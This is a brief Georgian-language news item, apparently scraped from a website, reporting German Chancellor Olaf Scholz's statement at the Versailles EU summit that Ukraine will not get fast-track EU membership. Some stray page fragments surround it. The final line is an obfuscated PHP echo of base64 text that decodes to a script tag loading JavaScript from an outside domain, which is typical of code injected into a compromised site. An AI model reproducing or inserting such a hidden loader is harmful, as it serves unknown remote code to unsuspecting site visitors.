gorgia
გარე ავეჯი
გერმანიის კანცლერის, ოლაფ შოლცის თქმით, უკრაინის ევროკავშირში გაწევრიანების დაჩქარებული პროცედურა არ იქნება. ამის შესახებ ინფორმაციას CNN ავრცელებს, აღნიშნული განცხადება გერმანიის კანცლერმა ვერსალში ევროკავშირის სამიტზე გააკეთა.
 
„ძალიან მნიშვნელოვანია, რომ განვაგრძოთ ის, რაც წარსულში გადავწყვიტეთ“,- განაცხადა შოლცმა.
 
მისივე თქმით, აუცილებელია ასოციაციების შეთანხმების იმპლემენტაცია, რომელიც უკრაინამ 2017 წელს გააფორმა.
 
„ეს არის კურსი, რომელსაც უნდა გავყვეთ“, – განაცხადა გერმანიის კანცლერმა.
 
 
1038
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");